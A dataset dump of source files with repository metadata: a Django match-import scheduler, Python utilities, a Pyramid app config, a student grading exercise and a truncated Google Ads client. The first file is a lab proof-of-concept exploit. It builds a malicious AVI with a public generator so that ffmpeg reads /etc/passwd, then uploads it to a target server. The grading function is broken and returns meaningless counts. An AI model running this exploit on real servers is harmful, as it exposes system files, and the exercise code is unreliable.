blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4134622276b22025842bfa81d13980db24e39416 | 041454da30317f0831d8af04a205db9716084ce9 | /docker/f_ffmpeg_1.py | 4646622786c900380acbad86af4f391aa3a63c83 | [] | no_license | elssm/Bug-Recurrence | 3db54b60e3968058566cdaf25589e61b147fb021 | 17365424c54401f83fc00547c7425e2f5901ef14 | refs/heads/master | 2020-05-02T20:18:16.429572 | 2019-03-28T11:16:23 | 2019-03-28T11:16:23 | 178,186,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,262 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#python version 3.6.4
#简介:脚本适用于docker下的vulapps环境,使用docker run -d -p 8004:80 medicean/vulapps:f_ffmpeg_1运行环境
#具体参见github地址:https://github.com/Medicean/VulApps/commit/86ee14f3b0c2e7e4fa1aa17655d77bed4184a177
#将poc下载到c盘根目录下
#此处ip为192.168.109.141
import requests
import os
import sys

# Usage: python f_ffmpeg_1.py [IP] [port]
argc = len(sys.argv) - 1
argv = sys.argv[1:]
# Bug fix: the original tested `argc == -1`, which is impossible
# (len(sys.argv) >= 1), so only the too-many-arguments case remains.
if argc > 2:
    print("用法:python", sys.argv[0], "IP地址 端口号")
    print("例如:url为http://127.0.0.1:8080/,则IP地址应为127.0.0.1,端口号应为8080")
    sys.exit()

# Defaults for the vulnerable docker environment.
ip = "192.168.109.141"
port = 8004
if argc >= 1:
    ip = argv[0]
if argc == 2:
    port = argv[1]

# Bug fix: the old URL pointed at the GitHub HTML blob page; fetch the raw file.
py_url = "https://raw.githubusercontent.com/neex/ffmpeg-avi-m3u-xbin/master/gen_xbin_avi.py"
req = requests.get(py_url)
with open("gen_xbin_avi.py", "wb") as f:
    f.write(req.content)  # bug fix: the downloaded script was never written to disk

# The generator is downloaded to the current working directory (not C:\).
if "gen_xbin_avi.py" in os.listdir("."):
    os.system("python3 gen_xbin_avi.py file:///etc/passwd passwd.avi")
    # str(port) is required when the default int port is used (TypeError before).
    url = "http://" + ip + ":" + str(port) + "/"
    data = None
    # Bug fix: upload the generated AVI, not a handle to the "C:" directory.
    files = {"field": ("passwd.avi", open("passwd.avi", "rb"))}
    r = requests.post(url, data, files=files)  # bug fix: was `request.post` (NameError)
    print("post successful")
else:
    print("No Such File")
| [
"noreply@github.com"
] | elssm.noreply@github.com |
8e1fec41ecc67bb074bc42051b00369bde2be3ef | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_211/ch140_2020_04_01_20_23_34_419582.py | 3947aeef47acbfc57438321e0d040d657c1d6513 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 312 | py | def faixa_notas(l):
l=[]
i=0
cinco=0
cincset=0
sete=0
quantidade=[cinco,cincset,sete]
while(i<len(l)):
if(l[i]<5):
cinco+=1
elif(l[i]>=5 and l[i]<7):
cincset+=1
else:
sete+=1
return quantidade
| [
"you@example.com"
] | you@example.com |
d918e24948a40341e21650f17e4b4c41965e9398 | ab4046bba677f9378053a68fb74a150c86202a02 | /tools/tools.py | 666d4f7142cd726e30cfd0ae4b86f1375f5ce9e0 | [] | no_license | bvillasen/cooling_tools | f321100025f3b3f8a33b8afae22074f5ff947405 | f4c47776d8489944c398c91ebffb6931d46fcb39 | refs/heads/main | 2021-12-02T18:26:24.315233 | 2021-08-13T04:18:37 | 2021-08-13T04:18:37 | 229,338,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,979 | py | import os, sys
from os import listdir
from os.path import isfile, join
import numpy as np
import h5py as h5
import time
def Combine_List_Pair(a, b):
    """Prefix every element of `b` with every element of `a`.

    Elements of `b` that are lists are extended (flattened) rather than
    nested, so the result is always a list of flat lists.
    """
    combined = []
    for left in a:
        for right in b:
            if type(right) is list:
                entry = [left] + right
            else:
                entry = [left, right]
            combined.append(entry)
    return combined
def Get_Parameters_Combination(param_vals):
    """Return every combination of parameter values as a list of lists.

    `param_vals` is a sequence of value-lists, one per parameter. The output
    ordering matches the original hand-rolled grid: the last parameter varies
    fastest, identical to `itertools.product`.

    Bug fix: the original crashed for a single parameter (n_param == 1)
    because the index grid then held bare ints instead of index lists.
    """
    from itertools import product
    return [list(combo) for combo in product(*param_vals)]
def print_progress(i, n, time_start):
    """Print an in-place progress line with an estimated time remaining (ETR).

    i: number of items completed so far.
    n: total number of items.
    time_start: epoch seconds when the work began (from time.time()).
    """
    import time
    # Bug fix: the original rebound the name `time` to the elapsed seconds,
    # shadowing the module it had just imported.
    elapsed = time.time() - time_start
    # Bug fix: guard i == 0; the original divided by i unconditionally and
    # raised ZeroDivisionError on the first call.
    remaining = elapsed * (n - i) / i if i > 0 else 0.0
    hrs = remaining // 3600
    mins = (remaining - hrs * 3600) // 60
    secs = remaining - hrs * 3600 - mins * 60
    etr = f'{hrs:02.0f}:{mins:02.0f}:{secs:02.0f}'
    progres = f'Progress: {i}/{n} {i/n*100:.1f}% ETR: {etr} '
    print_line_flush(progres)
def Get_Free_Memory(print_out=False):
    """Return the system's free virtual memory in gigabytes (via psutil)."""
    import psutil
    free_gb = psutil.virtual_memory().free / 1e9
    if print_out:
        print(f'Free Memory: {free_gb:.1f} GB')
    return free_gb
def check_if_file_exists(file_name):
    """Return True when `file_name` exists and is a regular file."""
    return isfile(file_name)
def Load_Pickle_Directory(input_name):
    """Load and return the pickled object stored at `input_name`."""
    import pickle
    print(f'Loading File: {input_name}')
    # Fix: use a context manager so the file handle is closed
    # (the original `pickle.load(open(...))` leaked it).
    with open(input_name, 'rb') as f:
        data = pickle.load(f)
    return data
def Write_Pickle_Directory(dir, output_name):
    """Pickle the object `dir` to the file `output_name`.

    The parameter keeps its original (builtin-shadowing) name `dir` for
    backward compatibility with existing keyword callers.
    """
    import pickle
    # Fix: the original never closed the handle; `with` guarantees flush+close.
    with open(output_name, 'wb') as f:
        pickle.dump(dir, f)
    print(f'Saved File: {output_name}')
def split_indices(indices, rank, n_procs, adjacent=False):
    """Return the index positions assigned to `rank` out of `n_procs` workers.

    indices: the full sequence being split (only its length is used).
    rank: this worker's rank in [0, n_procs).
    n_procs: total number of workers.
    adjacent: when True each rank receives a contiguous chunk; otherwise the
        positions are interleaved round-robin across ranks.
    """
    n_index_total = len(indices)
    # Ceiling division: maximum number of positions any one rank can own.
    n_proc_indices = (n_index_total - 1) // n_procs + 1
    # Fix: the original computed the round-robin split unconditionally and
    # then recomputed it in the else-branch; the dead first pass is removed.
    if adjacent:
        assigned = np.array([i + rank * n_proc_indices for i in range(n_proc_indices)])
    else:
        assigned = np.array([rank + i * n_procs for i in range(n_proc_indices)])
    # Trailing ranks may own fewer positions; drop out-of-range entries.
    return assigned[assigned < n_index_total]
def extend_path(dir=None):
    """Append every subdirectory of `dir` (default: cwd) to sys.path,
    skipping any path that contains '.git'."""
    root = dir or os.getcwd()
    sub_dirs = []
    for path, _, _ in os.walk(root):
        if '.git' not in path:
            sub_dirs.append(path)
    sys.path.extend(sub_dirs)
def print_mpi(text, rank, size, mpi_comm):
    """Print `text` from this rank only, serialized across `size` ranks.

    Every rank waits through `size` short turns (0.01 s each) and prints
    during its own turn, so output from different ranks does not interleave;
    all ranks then synchronize on the communicator's barrier.
    """
    for turn in range(size):
        if turn == rank:
            print(text)
        time.sleep(0.01)
    mpi_comm.Barrier()
def print_line_flush(terminalString):
    """Overwrite the current terminal line in place with `terminalString`."""
    sys.stdout.write('\r' + terminalString)
    sys.stdout.flush()
def create_directory( dir, print_out=True ):
    """Create directory `dir` if it does not already exist.

    `dir` is expected to end with '/' and its parent must already exist:
    only the final path component is created (plain os.mkdir, not makedirs).
    """
    if print_out: print(("Creating Directory: {0}".format(dir) ))
    # Split "<parent>/<name>/" into the parent path and the final component
    # (trailing '/' is sliced off before searching for the last separator).
    indx = dir[:-1].rfind('/' )
    inDir = dir[:indx]
    dirName = dir[indx:].replace('/','')
    # First os.walk tuple is (root, dirnames, filenames); [1] = existing subdirs.
    dir_list = next(os.walk(inDir))[1]
    if dirName in dir_list:
        if print_out: print( " Directory exists")
    else:
        os.mkdir( dir )
        if print_out: print( " Directory created")
def get_files_names( inDir, fileKey='', type=None ):
    """List (sorted) entries of `inDir`, optionally filtered by `fileKey`.

    type=None     -> all regular files; returns just the sorted name array.
    type='nyx'    -> any entry (files or directories) whose name contains
                     `fileKey`; returns (names, count).
    type='cholla' -> regular files whose name contains `fileKey`;
                     returns (names, count).
    """
    if not type: dataFiles = [f for f in listdir(inDir) if isfile(join(inDir, f)) ]
    if type=='nyx': dataFiles = [f for f in listdir(inDir) if (f.find(fileKey) >= 0 ) ]
    if type == 'cholla': dataFiles = [f for f in listdir(inDir) if (isfile(join(inDir, f)) and (f.find(fileKey) >= 0 ) ) ]
    # np.sort gives lexicographic order as a numpy array of strings.
    dataFiles = np.sort( dataFiles )
    nFiles = len( dataFiles )
    # index_stride = int(dataFiles[1][len(fileKey):]) - int(dataFiles[0][len(fileKey):])
    if not type: return dataFiles
    if type == 'nyx': return dataFiles, nFiles
    if type == 'cholla': return dataFiles, nFiles
| [
"bvillasen@gmail.com"
] | bvillasen@gmail.com |
5374d74a73bd8124eafa008ae144228c9c2bdbc9 | 2652fd6261631794535589427a384693365a585e | /trunk/workspace/Squish/src/API/Android/ActionBar/File/FileConst.py | d18e3b2246eefd013a70b883052c3b54eccb6cd0 | [] | no_license | ptqatester1/ptqa | 88c652380167f64a953bfd7a65041e7d8ac48c90 | 5b5997ea459e9aac17db8da2041e2af331927104 | refs/heads/master | 2021-01-21T19:06:49.275364 | 2017-06-19T03:15:00 | 2017-06-19T03:15:00 | 92,115,462 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 559 | py | class FileMenuConst:
NEW = ':newNetwork_HTML_Object'
LOAD = ':loadNetwork_HTML_Object'
SAVE = ':saveNetwork_HTML_Object'
SAVE_AS = ':saveAs_HTML_Object'
ABOUT_PT = ':about_HTML_Object'
#NETSPACE_LOGOUT = ':onLogout_HTML_Object'
#DROPBOX_LOGIN = ':dbLogin_HTML_Object'
SHARE_FACEBOOK = ':onScreenShot_HTML_Object'
OPTIONS = ':fileOptionsMenu_options_button_HTML_Object'
#EMAIL = ':email_HTML_Object'
EXIT = ':exit_HTML_Object'
class AboutPage:
VIEW_LICENSE = ':options_viewLicense_HTML_Object'
| [
"ptqatester1@gmail.com"
] | ptqatester1@gmail.com |
5a72cdf4e073f6fc04267e4ffd83999834f77307 | b2c0517a0421c32f6782d76e4df842875d6ffce5 | /Algorithms/Math/171. Excel Sheet Column Number.py | 394b929e34dda09459f87d61b0be287013ab7e34 | [] | no_license | SuYuxi/yuxi | e875b1536dc4b363194d0bef7f9a5aecb5d6199a | 45ad23a47592172101072a80a90de17772491e04 | refs/heads/master | 2022-10-04T21:29:42.017462 | 2022-09-30T04:00:48 | 2022-09-30T04:00:48 | 66,703,247 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | class Solution(object):
def titleToNumber(self, s):
num = 0
for i in s:
num = num*26 + (ord(i)-ord('A')+1)
return num
| [
"soration2099@gmail.com"
] | soration2099@gmail.com |
b3e7694ac5ff6f15948df85aa45cfdd6a80d169c | 71fafe9fb2190b6acf09f109105ca362bb9018c2 | /jcsbms/jcsbms/match_import_timer.py | 73cfe1de389815f1e235ace61b4546b089280935 | [] | no_license | zhangyibo007/bms | 1f43ca98057a72f1b62769719cb4aefbb4ffb289 | 1ae88e90415f0495d3a647112de0876da0b18e5e | refs/heads/master | 2021-06-21T05:40:24.468473 | 2017-08-02T12:35:08 | 2017-08-02T12:35:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,973 | py | # coding:utf-8
import sys,os,django
from datetime import timedelta,datetime
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) #manage.py的目录
os.environ['DJANGO_SETTINGS_MODULE'] = 'jcsbms.settings' #setting的目录
django.setup()
from apscheduler.schedulers.blocking import BlockingScheduler
from lottery.views import insert_match_from_football, select_scout_match_sql, insert_match_from_basketball, \
insert_cupleague_from_football, insert_cupleague_from_basketball
from lottery.models import Match, CupLeague
def scout_match_import():
    """Import scout matches scheduled within the next 48 hours.

    Reads football and basketball rows from the scout_*_match_info tables
    (raw SQL) and inserts any match not yet present in the Match table,
    once per language project: 'M' (Mandarin), 'C' (Cantonese) and
    'E' (English). Cup/league names missing from CupLeague are inserted too.
    Row indices: [0]=scout match id, [2]=Mandarin league name,
    [3]=Cantonese league name, [8]=English league name (per the index usage
    below -- confirm against the scout table schema).
    """
    print 'start import match at ', datetime.now().strftime("%Y/%m/%d %H:%M:%S")
    from_date = datetime.now().strftime("%Y/%m/%d %H:%M:%S")
    to_date = (datetime.now() + timedelta(hours=48)).strftime("%Y/%m/%d %H:%M:%S")
    scout_football_match_infos = select_scout_match_sql('scout_football_match_info', from_date, to_date) # raw SQL: scout football matches inside the time window
    scout_basketball_match_infos = select_scout_match_sql('scout_basketball_match_info', from_date, to_date)
    scout_match_id_list = Match.objects.filter(scout_match_id__isnull=False).values_list('scout_match_id', flat=True) # Match rows whose scout_match_id is not null
    cup_league_name_foot_man_list = list(CupLeague.objects.filter(project='M', sport_type= 0).values_list('name', flat=True))
    cup_league_name_foot_cant_list = list(CupLeague.objects.filter(project='C', sport_type= 0).values_list('name', flat=True))
    cup_league_name_foot_en_list = list(CupLeague.objects.filter(project='E', sport_type=0).values_list('name', flat=True))
    cup_league_name_basket_man_list = list(CupLeague.objects.filter(project='M', sport_type= 1).values_list('name', flat=True))
    cup_league_name_basket_cant_list = list(CupLeague.objects.filter(project='C', sport_type= 1).values_list('name', flat=True))
    cup_league_name_basket_en_list = list(CupLeague.objects.filter(project='E', sport_type=1).values_list('name', flat=True))
    # Football
    for scout_football_match_info in scout_football_match_infos:
        # If this match is not yet in the Match table, create it
        if scout_football_match_info[0] not in scout_match_id_list:
            insert_match_from_football(scout_football_match_info,project='M') # insert Mandarin match, from scout_football_match_info
            insert_match_from_football(scout_football_match_info,project='C') # insert Cantonese match, from scout_football_match_info
            insert_match_from_football(scout_football_match_info, project='E')# insert English match, from scout_football_match_info
        if scout_football_match_info[2] not in cup_league_name_foot_man_list:
            insert_cupleague_from_football(scout_football_match_info, project='M') # insert Mandarin cup/league, to lottery_cup_league
            cup_league_name_foot_man_list.append(scout_football_match_info[2])
        if scout_football_match_info[3] not in cup_league_name_foot_cant_list:
            insert_cupleague_from_football(scout_football_match_info, project='C') # insert Cantonese cup/league, to lottery_cup_league
            cup_league_name_foot_cant_list.append(scout_football_match_info[3])
        if scout_football_match_info[8] not in cup_league_name_foot_en_list:
            insert_cupleague_from_football(scout_football_match_info, project='E') # insert English cup/league, to lottery_cup_league
            cup_league_name_foot_en_list.append(scout_football_match_info[8])
    # Basketball (same pattern as football above)
    for scout_basketball_match_info in scout_basketball_match_infos:
        if scout_basketball_match_info[0] not in scout_match_id_list:
            insert_match_from_basketball(scout_basketball_match_info,project='M')
            insert_match_from_basketball(scout_basketball_match_info,project='C')
            insert_match_from_basketball(scout_basketball_match_info, project='E')
        if scout_basketball_match_info[2] not in cup_league_name_basket_man_list:
            insert_cupleague_from_basketball(scout_basketball_match_info,project='M')
            cup_league_name_basket_man_list.append(scout_basketball_match_info[2])
        if scout_basketball_match_info[3] not in cup_league_name_basket_cant_list:
            insert_cupleague_from_basketball(scout_basketball_match_info, project='C')
            cup_league_name_basket_cant_list.append(scout_basketball_match_info[3])
        if scout_basketball_match_info[8] not in cup_league_name_basket_en_list:
            insert_cupleague_from_basketball(scout_basketball_match_info, project='E')
            cup_league_name_basket_en_list.append(scout_basketball_match_info[8])
    print 'import match over at', datetime.now().strftime("%Y/%m/%d %H:%M:%S")
    print '-----------------------------------------------------------------------'
if __name__ == '__main__':
    # Run scout_match_import once a day at 12:00 using a blocking APScheduler
    # (the process stays alive inside scheduler.start()).
    scheduler = BlockingScheduler()
    scheduler.add_job(scout_match_import, 'cron', hour=12)
    try:
        scheduler.start()
    except (KeyboardInterrupt, SystemExit):
        # Shut the scheduler down cleanly on Ctrl-C / process exit.
        scheduler.shutdown()
"zhangyibo@caifuzhinan.com"
] | zhangyibo@caifuzhinan.com |
dd907560daeaba856d64a8eee0f86fdab5032374 | 3cd1c0b680d3ed9b251f6afec6fb2d362d9dc8df | /sample15_download_files_via_static_view/sample15_download_files_via_static_view/__init__.py | aa7807e9d48eb800042ca5c7712fb3920bd9ad85 | [] | no_license | williamwu0220/pyramid_sample | ff34e02b6fdb06d906148a7b18c13694701d13f3 | 1b7c7b2a9c97f27912f812c0dce817eb8eeb4457 | refs/heads/master | 2020-03-14T22:14:07.336295 | 2018-05-02T08:15:00 | 2018-05-02T08:15:00 | 131,816,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 859 | py | from pyramid.config import Configurator
def main(global_config, **settings):
    """ This function returns a Pyramid WSGI application.

    Configures jinja2 templating, the bundled static assets, a second
    static view serving the download directory given by the
    ``files_path`` ini setting, and the ``home``/``list`` routes.
    """
    config = Configurator(settings=settings)
    config.include('pyramid_jinja2')
    config.add_static_view('static', 'static', cache_max_age=3600)
    # for example:
    #
    # 1.
    # If set config.add_static_view('abc', 'def'), then
    # request.static_route('def/xyz.jpg) will produce /abc/xyz.jpb
    #
    # 2.
    # If set config.add_static_view('http://img.frontmobi.com', 'myimages'), then
    # request.static_route('myimages/myfile.jpg') will produce http://img.frontmobi.com/myfile.jpg

    # Expose the configured download directory under /files_path so files
    # can be downloaded straight from a static view.
    config.add_static_view('files_path', settings['files_path'], cache_max_age=3600)
    config.add_route('home', '/')
    config.add_route('list', '/list')
    config.scan()
    return config.make_wsgi_app()
"william@pylabs.org"
] | william@pylabs.org |
1c248a911e5a1405d3fc84ed99a09bf978ec9404 | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/ads/googleads/v5/googleads-py/google/ads/googleads/v5/services/services/keyword_plan_ad_group_service/client.py | 2a790adbbde469677fb299ece7d52de4516cde43 | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,948 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.ads.googleads.v5.resources.types import keyword_plan_ad_group
from google.ads.googleads.v5.services.types import keyword_plan_ad_group_service
from google.protobuf import wrappers_pb2 as wrappers # type: ignore
from google.rpc import status_pb2 as status # type: ignore
from .transports.base import KeywordPlanAdGroupServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import KeywordPlanAdGroupServiceGrpcTransport
class KeywordPlanAdGroupServiceClientMeta(type):
    """Metaclass for the KeywordPlanAdGroupService client.

    This provides class-level methods for building and retrieving
    support objects (e.g. transport) without polluting the client instance
    objects.
    """
    # Registry of transport implementations keyed by label; gRPC is the only
    # transport registered for this service.
    _transport_registry = OrderedDict()  # type: Dict[str, Type[KeywordPlanAdGroupServiceTransport]]
    _transport_registry['grpc'] = KeywordPlanAdGroupServiceGrpcTransport

    def get_transport_class(cls,
            label: str = None,
            ) -> Type[KeywordPlanAdGroupServiceTransport]:
        """Return an appropriate transport class.

        Args:
            label: The name of the desired transport. If none is
                provided, then the first transport in the registry is used.

        Returns:
            The transport class to use.
        """
        # If a specific transport is requested, return that one.
        if label:
            return cls._transport_registry[label]

        # No transport is requested; return the default (that is, the first one
        # in the dictionary).
        return next(iter(cls._transport_registry.values()))
class KeywordPlanAdGroupServiceClient(metaclass=KeywordPlanAdGroupServiceClientMeta):
"""Service to manage Keyword Plan ad groups."""
    @staticmethod
    def _get_default_mtls_endpoint(api_endpoint):
        """Convert api endpoint to mTLS endpoint.

        Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
        "*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.

        Args:
            api_endpoint (Optional[str]): the api endpoint to convert.
        Returns:
            str: converted mTLS api endpoint.
        """
        if not api_endpoint:
            return api_endpoint

        # Decompose the host into name / optional ".mtls" / optional ".sandbox"
        # / optional ".googleapis.com" segments.
        mtls_endpoint_re = re.compile(
            r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
        )

        m = mtls_endpoint_re.match(api_endpoint)
        name, mtls, sandbox, googledomain = m.groups()
        # Already an mTLS endpoint, or not a googleapis.com host: unchanged.
        if mtls or not googledomain:
            return api_endpoint

        if sandbox:
            return api_endpoint.replace(
                "sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
            )

        return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = 'googleads.googleapis.com'
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
    @classmethod
    def from_service_account_info(cls, info: dict, *args, **kwargs):
        """Creates an instance of this client using the provided credentials info.

        Args:
            info (dict): The service account private key info.
            args: Additional arguments to pass to the constructor.
            kwargs: Additional arguments to pass to the constructor.

        Returns:
            KeywordPlanAdGroupServiceClient: The constructed client.
        """
        credentials = service_account.Credentials.from_service_account_info(info)
        # The parsed credentials override any caller-supplied `credentials` kwarg.
        kwargs["credentials"] = credentials
        return cls(*args, **kwargs)
    @classmethod
    def from_service_account_file(cls, filename: str, *args, **kwargs):
        """Creates an instance of this client using the provided credentials
        file.

        Args:
            filename (str): The path to the service account private key json
                file.
            args: Additional arguments to pass to the constructor.
            kwargs: Additional arguments to pass to the constructor.

        Returns:
            KeywordPlanAdGroupServiceClient: The constructed client.
        """
        credentials = service_account.Credentials.from_service_account_file(
            filename)
        # The parsed credentials override any caller-supplied `credentials` kwarg.
        kwargs['credentials'] = credentials
        return cls(*args, **kwargs)

    # Backwards-compatible alias kept for callers of the older name.
    from_service_account_json = from_service_account_file
    @property
    def transport(self) -> KeywordPlanAdGroupServiceTransport:
        """Return the transport used by the client instance.

        Returns:
            KeywordPlanAdGroupServiceTransport: The transport used by the client instance.
        """
        # Set during __init__; never None once construction succeeds.
        return self._transport
    @staticmethod
    def keyword_plan_ad_group_path(customer: str,keyword_plan_ad_group: str,) -> str:
        """Return a fully-qualified keyword_plan_ad_group resource name string."""
        return "customers/{customer}/keywordPlanAdGroups/{keyword_plan_ad_group}".format(customer=customer, keyword_plan_ad_group=keyword_plan_ad_group, )
    @staticmethod
    def parse_keyword_plan_ad_group_path(path: str) -> Dict[str,str]:
        """Parse a keyword_plan_ad_group path into its component segments
        (empty dict when the path does not match)."""
        m = re.match(r"^customers/(?P<customer>.+?)/keywordPlanAdGroups/(?P<keyword_plan_ad_group>.+?)$", path)
        return m.groupdict() if m else {}
    @staticmethod
    def keyword_plan_campaign_path(customer: str,keyword_plan_campaign: str,) -> str:
        """Return a fully-qualified keyword_plan_campaign resource name string."""
        return "customers/{customer}/keywordPlanCampaigns/{keyword_plan_campaign}".format(customer=customer, keyword_plan_campaign=keyword_plan_campaign, )
    @staticmethod
    def parse_keyword_plan_campaign_path(path: str) -> Dict[str,str]:
        """Parse a keyword_plan_campaign path into its component segments
        (empty dict when the path does not match)."""
        m = re.match(r"^customers/(?P<customer>.+?)/keywordPlanCampaigns/(?P<keyword_plan_campaign>.+?)$", path)
        return m.groupdict() if m else {}
    @staticmethod
    def common_billing_account_path(billing_account: str, ) -> str:
        """Return a fully-qualified billing_account resource name string."""
        return "billingAccounts/{billing_account}".format(billing_account=billing_account, )
    @staticmethod
    def parse_common_billing_account_path(path: str) -> Dict[str,str]:
        """Parse a billing_account path into its component segments
        (empty dict when the path does not match)."""
        m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
        return m.groupdict() if m else {}
    @staticmethod
    def common_folder_path(folder: str, ) -> str:
        """Return a fully-qualified folder resource name string."""
        return "folders/{folder}".format(folder=folder, )
    @staticmethod
    def parse_common_folder_path(path: str) -> Dict[str,str]:
        """Parse a folder path into its component segments
        (empty dict when the path does not match)."""
        m = re.match(r"^folders/(?P<folder>.+?)$", path)
        return m.groupdict() if m else {}
    @staticmethod
    def common_organization_path(organization: str, ) -> str:
        """Return a fully-qualified organization resource name string."""
        return "organizations/{organization}".format(organization=organization, )
    @staticmethod
    def parse_common_organization_path(path: str) -> Dict[str,str]:
        """Parse an organization path into its component segments
        (empty dict when the path does not match)."""
        m = re.match(r"^organizations/(?P<organization>.+?)$", path)
        return m.groupdict() if m else {}
    @staticmethod
    def common_project_path(project: str, ) -> str:
        """Return a fully-qualified project resource name string."""
        return "projects/{project}".format(project=project, )
    @staticmethod
    def parse_common_project_path(path: str) -> Dict[str,str]:
        """Parse a project path into its component segments
        (empty dict when the path does not match)."""
        m = re.match(r"^projects/(?P<project>.+?)$", path)
        return m.groupdict() if m else {}
    @staticmethod
    def common_location_path(project: str, location: str, ) -> str:
        """Return a fully-qualified location resource name string."""
        return "projects/{project}/locations/{location}".format(project=project, location=location, )
    @staticmethod
    def parse_common_location_path(path: str) -> Dict[str,str]:
        """Parse a location path into its component segments
        (empty dict when the path does not match)."""
        m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
        return m.groupdict() if m else {}
    def __init__(self, *,
            credentials: Optional[credentials.Credentials] = None,
            transport: Union[str, KeywordPlanAdGroupServiceTransport, None] = None,
            client_options: Optional[client_options_lib.ClientOptions] = None,
            client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
            ) -> None:
        """Instantiate the keyword plan ad group service client.

        Args:
            credentials (Optional[google.auth.credentials.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify the application to the service; if none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
            transport (Union[str, ~.KeywordPlanAdGroupServiceTransport]): The
                transport to use. If set to None, a transport is chosen
                automatically.
            client_options (google.api_core.client_options.ClientOptions): Custom options for the
                client. It won't take effect if a ``transport`` instance is provided.
                (1) The ``api_endpoint`` property can be used to override the
                default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
                environment variable can also be used to override the endpoint:
                "always" (always use the default mTLS endpoint), "never" (always
                use the default regular endpoint) and "auto" (auto switch to the
                default mTLS endpoint if client certificate is present, this is
                the default value). However, the ``api_endpoint`` property takes
                precedence if provided.
                (2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
                is "true", then the ``client_cert_source`` property can be used
                to provide client certificate for mutual TLS transport. If
                not provided, the default SSL client certificate will be used if
                present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
                set, no client certificate will be used.
            client_info (google.api_core.gapic_v1.client_info.ClientInfo):
                The client info used to send a user-agent string along with
                API requests. If ``None``, then default info will be used.
                Generally, you only need to set this if you're developing
                your own client library.

        Raises:
            google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
                creation failed for any reason.
        """
        # A plain dict is accepted for convenience and converted here.
        if isinstance(client_options, dict):
            client_options = client_options_lib.from_dict(client_options)
        if client_options is None:
            client_options = client_options_lib.ClientOptions()

        # Create SSL credentials for mutual TLS if needed.
        use_client_cert = bool(util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")))

        ssl_credentials = None
        is_mtls = False
        if use_client_cert:
            if client_options.client_cert_source:
                import grpc  # type: ignore

